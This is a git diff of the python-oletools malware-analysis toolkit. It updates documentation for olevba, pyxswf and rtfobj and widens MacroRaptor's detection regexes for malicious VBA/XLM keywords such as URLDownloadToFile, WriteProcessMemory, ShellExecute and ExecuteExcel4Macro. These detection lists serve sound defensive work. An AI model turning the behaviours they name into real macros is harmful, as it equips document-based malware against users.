VBA_Parser will raise an exception if the file is not a supported format, such as OLE (MS Office 97-2003), OpenXML (MS Office 2007+), MHTML or Word 2003 XML.
After parsing the file, the attribute VBA_Parser.type is a string indicating the file type. It can be either TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML or TYPE_MHTML. (constants defined in the olevba module)
Detect VBA macros
The method detect_vba_macros of a VBA_Parser object returns True if VBA macros have been found in the file, False otherwise.
-if vbaparser.detect_vba_macros():
- print 'VBA Macros found'
-else:
- print 'No VBA Macros found'
+
Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will always return False because VBA Macros are stored in a different way which is not yet supported by olevba.
-Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.
+Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.
Extract VBA Macro Source Code
The method extract_macros extracts and decompresses source code for each VBA macro found in the file (possibly including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code) for each VBA macro found.
-- filename: If the file is OLE (MS Office 97-2003), filename is the path of the file. If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive, e.g. word/vbaProject.bin.
+- filename: If the file is OLE (MS Office 97-2003), filename is the path of the file. If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive, e.g. word/vbaProject.bin.
- stream_path: path of the OLE stream containing the VBA macro source code
- vba_filename: corresponding VBA filename
- vba_code: string containing the VBA source code in clear text
Example:
-for (filename, stream_path, vba_filename, vba_code) in vbaparser.extract_macros():
- print '-'*79
- print 'Filename :', filename
- print 'OLE stream :', stream_path
- print 'VBA filename:', vba_filename
- print '- '*39
- print vba_code
+for (filename, stream_path, vba_filename, vba_code) in vbaparser.extract_macros():
+ print '-'*79
+ print 'Filename :', filename
+ print 'OLE stream :', stream_path
+ print 'VBA filename:', vba_filename
+ print '- '*39
+ print vba_code
Alternatively, the VBA_Parser method extract_all_macros returns the same results as a list of tuples.
Analyze VBA Source Code
Since version 0.40, the VBA_Parser class provides simpler methods than VBA_Scanner to analyze all macros contained in a file:
@@ -278,29 +324,29 @@ Analyze VBA Source Code
analyze_macros() takes an optional argument show_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value. By default, it will only include the strings which contain printable characters.
VBA_Parser.analyze_macros() returns a list of tuples (type, keyword, description), one for each item in the results.
-- type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String', 'Dridex String' or 'VBA obfuscated Strings'.
+- type may be either ‘AutoExec’, ‘Suspicious’, ‘IOC’, ‘Hex String’, ‘Base64 String’, ‘Dridex String’ or ‘VBA obfuscated Strings’.
- keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is the decoded value of the string.
- description provides a description of the keyword. For obfuscated strings, it is the encoded value of the string.
Example:
-results = vbaparser.analyze_macros()
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+results = vbaparser.analyze_macros()
+for kw_type, keyword, description in results:
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
After calling analyze_macros, the following VBA_Parser attributes also provide the number of items found for each category:
-print 'AutoExec keywords: %d' % vbaparser.nb_autoexec
-print 'Suspicious keywords: %d' % vbaparser.nb_suspicious
-print 'IOCs: %d' % vbaparser.nb_iocs
-print 'Hex obfuscated strings: %d' % vbaparser.nb_hexstrings
-print 'Base64 obfuscated strings: %d' % vbaparser.nb_base64strings
-print 'Dridex obfuscated strings: %d' % vbaparser.nb_dridexstrings
-print 'VBA obfuscated strings: %d' % vbaparser.nb_vbastrings
+print 'AutoExec keywords: %d' % vbaparser.nb_autoexec
+print 'Suspicious keywords: %d' % vbaparser.nb_suspicious
+print 'IOCs: %d' % vbaparser.nb_iocs
+print 'Hex obfuscated strings: %d' % vbaparser.nb_hexstrings
+print 'Base64 obfuscated strings: %d' % vbaparser.nb_base64strings
+print 'Dridex obfuscated strings: %d' % vbaparser.nb_dridexstrings
+print 'VBA obfuscated strings: %d' % vbaparser.nb_vbastrings
Deobfuscate VBA Macro Source Code
The method reveal attempts to deobfuscate the macro source code by replacing all the obfuscated strings by their decoded content. Returns a single string.
Example:
-print vbaparser.reveal()
+
Close the VBA_Parser
After usage, it is better to call the close method of the VBA_Parser object, to make sure the file is closed, especially if your application is parsing many files.
-vbaparser.close()
+
Deprecated API
The following methods and functions are still functional, but their usage is not recommended since they have been replaced by better solutions.
@@ -310,59 +356,59 @@ VBA_Scanner (deprecated)
scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value.
scan returns a list of tuples (type, keyword, description), one for each item in the results.
-- type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String'.
+- type may be either ‘AutoExec’, ‘Suspicious’, ‘IOC’, ‘Hex String’, ‘Base64 String’ or ‘Dridex String’.
- keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is the decoded value of the string.
- description provides a description of the keyword. For obfuscated strings, it is the encoded value of the string.
Example:
-vba_scanner = VBA_Scanner(vba_code)
-results = vba_scanner.scan(include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+vba_scanner = VBA_Scanner(vba_code)
+results = vba_scanner.scan(include_decoded_strings=True)
+for kw_type, keyword, description in results:
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
The function scan_vba is a shortcut for VBA_Scanner(vba_code).scan():
-results = scan_vba(vba_code, include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+results = scan_vba(vba_code, include_decoded_strings=True)
+for kw_type, keyword, description in results:
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
scan_summary returns a tuple with the number of items found for each category: (autoexec, suspicious, IOCs, hex, base64, dridex).
Detect auto-executable macros (deprecated)
Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
The function detect_autoexec checks if VBA macro code contains specific macro names that will be triggered when the document/workbook is opened, closed, changed, etc.
It returns a list of tuples containing two strings, the detected keyword, and the description of the trigger. (See the malware example above)
Sample usage:
-from oletools.olevba import detect_autoexec
-autoexec_keywords = detect_autoexec(vba_code)
-if autoexec_keywords:
- print 'Auto-executable macro keywords found:'
- for keyword, description in autoexec_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Auto-executable macro keywords: None found'
+from oletools.olevba import detect_autoexec
+autoexec_keywords = detect_autoexec(vba_code)
+if autoexec_keywords:
+ print 'Auto-executable macro keywords found:'
+ for keyword, description in autoexec_keywords:
+ print '%s: %s' % (keyword, description)
+else:
+ print 'Auto-executable macro keywords: None found'
Detect suspicious VBA keywords (deprecated)
Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
The function detect_suspicious checks if VBA macro code contains specific keywords often used by malware to act on the system (create files, run commands or applications, write to the registry, etc).
It returns a list of tuples containing two strings, the detected keyword, and the description of the corresponding malicious behaviour. (See the malware example above)
Sample usage:
-from oletools.olevba import detect_suspicious
-suspicious_keywords = detect_suspicious(vba_code)
-if suspicious_keywords:
- print 'Suspicious VBA keywords found:'
- for keyword, description in suspicious_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Suspicious VBA keywords: None found'
+from oletools.olevba import detect_suspicious
+suspicious_keywords = detect_suspicious(vba_code)
+if suspicious_keywords:
+ print 'Suspicious VBA keywords found:'
+ for keyword, description in suspicious_keywords:
+ print '%s: %s' % (keyword, description)
+else:
+ print 'Suspicious VBA keywords: None found'
Extract potential IOCs (deprecated)
Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
The function detect_patterns checks if VBA macro code contains specific patterns of interest, that may be useful for malware analysis and detection (potential Indicators of Compromise): IP addresses, e-mail addresses, URLs, executable file names.
It returns a list of tuples containing two strings, the pattern type, and the extracted value. (See the malware example above)
Sample usage:
-from oletools.olevba import detect_patterns
-patterns = detect_patterns(vba_code)
-if patterns:
- print 'Patterns found:'
- for pattern_type, value in patterns:
- print '%s: %s' % (pattern_type, value)
-else:
- print 'Patterns: None found'
+from oletools.olevba import detect_patterns
+patterns = detect_patterns(vba_code)
+if patterns:
+ print 'Patterns found:'
+ for pattern_type, value in patterns:
+ print '%s: %s' % (pattern_type, value)
+else:
+ print 'Patterns: None found'
python-oletools documentation
@@ -372,16 +418,17 @@ python-oletools documentation
- Contribute, Suggest Improvements or Report Issues
- Tools:
diff --git a/oletools/doc/olevba.md b/oletools/doc/olevba.md
index 5b1e130f..8d18dcac 100644
--- a/oletools/doc/olevba.md
+++ b/oletools/doc/olevba.md
@@ -8,6 +8,7 @@ VBA keywords** used by malware, anti-sandboxing and anti-virtualization techniqu
and potential **IOCs** (IP addresses, URLs, executable filenames, etc).
It also detects and decodes several common **obfuscation methods including Hex encoding,
StrReverse, Base64, Dridex, VBA expressions**, and extracts IOCs from decoded strings.
+XLM/Excel 4 Macros are also supported in Excel and SLK files.
It can be used either as a command-line tool, or as a python module from your own applications.
@@ -18,17 +19,18 @@ by John William Davison, with significant modifications.
## Supported formats
-- Word 97-2003 (.doc, .dot)
-- Word 2007+ (.docm, .dotm)
+- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+- Word/PowerPoint 2007+ XML (aka Flat OPC)
- Word 2003 XML (.xml)
-- Word/Excel MHTML, aka Single File Web Page (.mht)
-- Excel 97-2003 (.xls)
-- Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 2007+ (.pptm, .ppsm)
+- Word/Excel Single File Web Page / MHTML (.mht)
+- Publisher (.pub)
+- SYLK/SLK files (.slk)
- Text file containing VBA or VBScript source code
- Password-protected Zip archive containing any of the above
-## Main Features
+S## Main Features
- Detect VBA macros in MS Office 97-2003 and 2007+ files, XML, MHT
- Extract VBA macro source code
@@ -67,85 +69,95 @@ and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames,
## Usage
```text
-Usage: olevba.py [options] [filename2 ...]
-
+Usage: olevba [options] [filename2 ...]
+
Options:
-h, --help show this help message and exit
-r find files recursively in subdirectories.
-z ZIP_PASSWORD, --zip=ZIP_PASSWORD
if the file is a zip archive, open all files from it,
- using the provided password (requires Python 2.6+)
+ using the provided password.
+ -p PASSWORD, --password=PASSWORD
+ if encrypted office files are encountered, try
+ decryption with this password. May be repeated.
-f ZIP_FNAME, --zipfname=ZIP_FNAME
if the file is a zip archive, file(s) to be opened
within the zip. Wildcards * and ? are supported.
(default:*)
- -t, --triage triage mode, display results as a summary table
- (default for multiple files)
- -d, --detailed detailed mode, display full results (default for
- single file)
-a, --analysis display only analysis results, not the macro source
code
-c, --code display only VBA source code, do not analyze it
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed
- (no parsing)
--decode display all the obfuscated strings with their decoded
content (Hex, Base64, StrReverse, Dridex, VBA).
--attr display the attribute lines at the beginning of VBA
source code
--reveal display the macro source code after replacing all the
obfuscated strings by their decoded content.
+ -l LOGLEVEL, --loglevel=LOGLEVEL
+ logging level debug/info/warning/error/critical
+ (default=warning)
+ --deobf Attempt to deobfuscate VBA expressions (slow)
+ --relaxed Do not raise errors if opening of substream fails
+
+ Output mode (mutually exclusive):
+ -t, --triage triage mode, display results as a summary table
+ (default for multiple files)
+ -d, --detailed detailed mode, display full results (default for
+ single file)
+ -j, --json json mode, detailed in json format (never default)
```
+**New in v0.54:** the -p option can now be used to decrypt encrypted documents using the provided password(s).
+
### Examples
Scan a single file:
```text
-olevba.py file.doc
+olevba file.doc
```
Scan a single file, stored in a Zip archive with password "infected":
```text
-olevba.py malicious_file.xls.zip -z infected
+olevba malicious_file.xls.zip -z infected
```
Scan a single file, showing all obfuscated strings decoded:
```text
-olevba.py file.doc --decode
+olevba file.doc --decode
```
Scan a single file, showing the macro source code with VBA strings deobfuscated:
```text
-olevba.py file.doc --reveal
+olevba file.doc --reveal
```
Scan VBA source code extracted into a text file:
```text
-olevba.py source_code.vba
+olevba source_code.vba
```
Scan a collection of files stored in a folder:
```text
-olevba.py "MalwareZoo/VBA/*"
+olevba "MalwareZoo/VBA/*"
```
NOTE: On Linux, MacOSX and other Unix variants, it is required to add double quotes around wildcards. Otherwise, they will be expanded by the shell instead of olevba.
Scan all .doc and .xls files, recursively in all subfolders:
```text
-olevba.py "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
+olevba "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
```
Scan all .doc files within all .zip files with password, recursively:
```text
-olevba.py "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
+olevba "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
```
@@ -156,7 +168,7 @@ When a single file is scanned, or when using the option -d, all details of the a
For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
```text
->olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+>olevba c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
===============================================================================
FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
Type: OLE
@@ -233,7 +245,7 @@ The following flags show the results of the analysis:
Here is an example:
```text
-c:\>olevba.py \MalwareZoo\VBA\samples\*
+c:\>olevba \MalwareZoo\VBA\samples\*
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
@@ -256,10 +268,9 @@ OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
## Python 3 support - olevba3
-As of v0.50, olevba has been ported to Python 3 thanks to @sebdraven.
-However, the differences between Python 2 and 3 are significant and for now
-there is a separate version of olevba named olevba3 to be used with
-Python 3.
+Since v0.54, olevba is fully compatible with both Python 2 and 3.
+There is no need to use olevba3 anymore, however it is still present for backward compatibility.
+
--------------------------------------------------------------------------
@@ -531,14 +542,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/pyxswf.html b/oletools/doc/pyxswf.html
index 4e135afd..e76c31c3 100644
--- a/oletools/doc/pyxswf.html
+++ b/oletools/doc/pyxswf.html
@@ -1,22 +1,30 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
pyxswf
-pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
It is part of the python-oletools package.
pyxswf is an extension to xxxswf.py published by Alexander Hanel.
Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
Usage
-Usage: pyxswf.py [options] <file.bad>
+Usage: pyxswf [options] <file.bad>
Options:
-o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
@@ -38,18 +46,18 @@ Usage
contain SWFs. Must provide path in quotes
-c, --compress Compresses the SWF using Zlib
Example 1 - detecting and extracting a SWF file from a Word document on Windows:
-C:\oletools>pyxswf.py -o word_flash.doc
+C:\oletools>pyxswf -o word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
-C:\oletools>pyxswf.py -xo word_flash.doc
+C:\oletools>pyxswf -xo word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
[FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
-C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+C:\oletools>pyxswf -xf "rtf_flash.rtf"
RTF embedded object size 1498557 at index 000036DD
[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
00036DD
@@ -66,16 +74,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/pyxswf.md b/oletools/doc/pyxswf.md
index e56b88c8..6be489a0 100644
--- a/oletools/doc/pyxswf.md
+++ b/oletools/doc/pyxswf.md
@@ -21,7 +21,7 @@ For this, simply add the -o option to work on OLE streams rather than raw files,
## Usage
```text
-Usage: pyxswf.py [options]
+Usage: pyxswf [options]
Options:
-o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
@@ -47,12 +47,12 @@ Options:
### Example 1 - detecting and extracting a SWF file from a Word document on Windows:
```text
-C:\oletools>pyxswf.py -o word_flash.doc
+C:\oletools>pyxswf -o word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
-C:\oletools>pyxswf.py -xo word_flash.doc
+C:\oletools>pyxswf -xo word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
@@ -62,7 +62,7 @@ OLE stream: 'Contents'
### Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
```text
-C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+C:\oletools>pyxswf -xf "rtf_flash.rtf"
RTF embedded object size 1498557 at index 000036DD
[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
00036DD
@@ -84,14 +84,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/rtfobj.html b/oletools/doc/rtfobj.html
index e3386d9f..fa79807d 100644
--- a/oletools/doc/rtfobj.html
+++ b/oletools/doc/rtfobj.html
@@ -1,53 +1,89 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
rtfobj
rtfobj is a Python module to detect and extract embedded objects stored in RTF files, such as OLE objects. It can also detect OLE Package objects, and extract the embedded files.
-Since v0.50, rtfobj contains a custom RTF parser that has been designed to match MS Word's behaviour, in order to handle obfuscated RTF files. See my article "Anti-Analysis Tricks in Weaponized RTF" for some concrete examples.
+Since v0.50, rtfobj contains a custom RTF parser that has been designed to match MS Word’s behaviour, in order to handle obfuscated RTF files. See my article “Anti-Analysis Tricks in Weaponized RTF” for some concrete examples.
rtfobj can be used as a Python library or a command-line tool.
It is part of the python-oletools package.
Usage
@@ -73,22 +109,19 @@ Usage
-d OUTPUT_DIR use specified directory to save output files.
rtfobj displays a list of the OLE and Package objects that have been detected, with their attributes such as class and filename.
When an OLE Package object contains an executable file or script, it is highlighted as such. For example:
-
-
-
-
+![](rtfobj1.png)
To extract an object or file, use the option -s followed by the object number as shown in the table.
Example:
rtfobj -s 0
-It extracts and decodes the corresponding object, and saves it as a file named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
+It extracts and decodes the corresponding object, and saves it as a file named “object_xxxx.bin”, xxxx being the location of the object in the RTF file.
How to use rtfobj in Python applications
As of v0.50, the API has changed significantly and it is not final yet. For now, see the class RtfObjectParser in the code.
Deprecated API (still functional):
rtf_iter_objects(filename) is an iterator which yields a tuple (index, orig_len, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
Example:
-from oletools import rtfobj
-for index, orig_len, data in rtfobj.rtf_iter_objects("myfile.rtf"):
- print('found object size %d at index %08X' % (len(data), index))
+from oletools import rtfobj
+for index, orig_len, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+ print('found object size %d at index %08X' % (len(data), index))
python-oletools documentation
@@ -98,16 +131,17 @@ python-oletools documentation
- Contribute, Suggest Improvements or Report Issues
- Tools:
diff --git a/oletools/doc/rtfobj.md b/oletools/doc/rtfobj.md
index 79f7deba..5c5b511e 100644
--- a/oletools/doc/rtfobj.md
+++ b/oletools/doc/rtfobj.md
@@ -89,14 +89,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/ezhexviewer.py b/oletools/ezhexviewer.py
index 701f05e1..142d547e 100644
--- a/oletools/ezhexviewer.py
+++ b/oletools/ezhexviewer.py
@@ -16,7 +16,7 @@
ezhexviewer project website: http://www.decalage.info/python/ezhexviewer
-ezhexviewer is copyright (c) 2012-2017, Philippe Lagadec (http://www.decalage.info)
+ezhexviewer is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
@@ -48,8 +48,9 @@
# 2016-10-26 PL: - fixed to run on Python 2+3
# 2017-03-23 v0.51 PL: - fixed display of control characters (issue #151)
# 2017-04-26 PL: - fixed absolute imports (issue #141)
+# 2018-09-15 v0.54 PL: - easygui is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#-----------------------------------------------------------------------------
# TODO:
@@ -71,7 +72,7 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.easygui import easygui
+import easygui
# === PYTHON 2+3 SUPPORT ======================================================
diff --git a/oletools/mraptor.py b/oletools/mraptor.py
index 7504dbdc..198b90d9 100644
--- a/oletools/mraptor.py
+++ b/oletools/mraptor.py
@@ -9,6 +9,7 @@
- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+- Word/PowerPoint 2007+ XML (aka Flat OPC)
- Word 2003 XML (.xml)
- Word/Excel Single File Web Page / MHTML (.mht)
- Publisher (.pub)
@@ -22,7 +23,7 @@
# === LICENSE ==================================================================
-# MacroRaptor is copyright (c) 2016-2017 Philippe Lagadec (http://www.decalage.info)
+# MacroRaptor is copyright (c) 2016-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -56,8 +57,12 @@
# 2016-10-25 PL: - fixed print for Python 3
# 2016-12-21 v0.51 PL: - added more ActiveX macro triggers
# 2017-03-08 PL: - fixed absolute imports
+# 2018-05-25 v0.53 PL: - added Word/PowerPoint 2007+ XML (aka Flat OPC) issue #283
+# 2019-04-04 v0.54 PL: - added ExecuteExcel4Macro, ShellExecuteA, XLM keywords
+# 2019-11-06 v0.55 PL: - added SetTimer
+# 2020-04-20 v0.56 PL: - added keywords RUN and CALL for XLM macros (issue #562)
-__version__ = '0.51'
+__version__ = '0.56dev5'
#------------------------------------------------------------------------------
# TODO:
@@ -83,6 +88,7 @@
from oletools.thirdparty.tablestream import tablestream
from oletools import olevba
+from oletools.olevba import TYPE2TAG
# === LOGGING =================================================================
@@ -116,29 +122,21 @@
r'|DocumentComplete|DownloadBegin|DownloadComplete|FileDownload' +
r'|NavigateComplete2|NavigateError|ProgressChange|PropertyChange' +
r'|SetSecureLockIcon|StatusTextChange|TitleChange|MouseMove' +
- r'|MouseEnter|MouseLeave|))\b')
+ r'|MouseEnter|MouseLeave|OnConnecting))|Auto_Ope\b')
+# TODO: "Auto_Ope" is temporarily here because of a bug in plugin_biff, which misses the last byte in "Auto_Open"...
# MS-VBAL 5.4.5.1 Open Statement:
RE_OPEN_WRITE = r'(?:\bOpen\b[^\n]+\b(?:Write|Append|Binary|Output|Random)\b)'
re_write = re.compile(r'(?i)\b(?:FileCopy|CopyFile|Kill|CreateTextFile|'
- + r'VirtualAlloc|RtlMoveMemory|URLDownloadToFileA?|AltStartupPath|'
+ + r'VirtualAlloc|RtlMoveMemory|URLDownloadToFileA?|AltStartupPath|WriteProcessMemory|'
+ r'ADODB\.Stream|WriteText|SaveToFile|SaveAs|SaveAsRTF|FileSaveAs|MkDir|RmDir|SaveSetting|SetAttr)\b|' + RE_OPEN_WRITE)
# MS-VBAL 5.2.3.5 External Procedure Declaration
RE_DECLARE_LIB = r'(?:\bDeclare\b[^\n]+\bLib\b)'
-re_execute = re.compile(r'(?i)\b(?:Shell|CreateObject|GetObject|SendKeys|'
- + r'MacScript|FollowHyperlink|CreateThread|ShellExecute)\b|' + RE_DECLARE_LIB)
-
-# short tag to display file types in triage mode:
-TYPE2TAG = {
- olevba.TYPE_OLE: 'OLE',
- olevba.TYPE_OpenXML: 'OpX',
- olevba.TYPE_Word2003_XML: 'XML',
- olevba.TYPE_MHTML: 'MHT',
- olevba.TYPE_TEXT: 'TXT',
-}
+re_execute = re.compile(r'(?i)\b(?:Shell|CreateObject|GetObject|SendKeys|RUN|CALL|'
+ + r'MacScript|FollowHyperlink|CreateThread|ShellExecuteA?|ExecuteExcel4Macro|EXEC|REGISTER|SetTimer)\b|' + RE_DECLARE_LIB)
# === CLASSES =================================================================
diff --git a/oletools/mraptor3.py b/oletools/mraptor3.py
index b4215620..f3d72359 100644
--- a/oletools/mraptor3.py
+++ b/oletools/mraptor3.py
@@ -1,70 +1,10 @@
#!/usr/bin/env python
-"""
-mraptor.py - MacroRaptor
-MacroRaptor is a script to parse OLE and OpenXML files such as MS Office
-documents (e.g. Word, Excel), to detect malicious macros.
+# mraptor3 is a stub that redirects to mraptor.py, for backwards compatibility
-Supported formats:
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
-- Word 2003 XML (.xml)
-- Word/Excel Single File Web Page / MHTML (.mht)
-- Publisher (.pub)
+import sys, os, warnings
-Author: Philippe Lagadec - http://www.decalage.info
-License: BSD, see source code or documentation
-
-MacroRaptor is part of the python-oletools package:
-http://www.decalage.info/python/oletools
-"""
-
-# === LICENSE ==================================================================
-
-# MacroRaptor is copyright (c) 2016-2017 Philippe Lagadec (http://www.decalage.info)
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-#------------------------------------------------------------------------------
-# CHANGELOG:
-# 2016-02-23 v0.01 PL: - first version
-# 2016-02-29 v0.02 PL: - added Workbook_Activate, FileSaveAs
-# 2016-03-04 v0.03 PL: - returns an exit code based on the overall result
-# 2016-03-08 v0.04 PL: - collapse long lines before analysis
-# 2016-07-19 v0.50 SL: - converted to Python 3
-# 2016-08-26 PL: - changed imports for Python 3
-# 2017-04-26 v0.51 PL: - fixed absolute imports (issue #141)
-# 2017-06-29 PL: - synced with mraptor.py 0.51
-
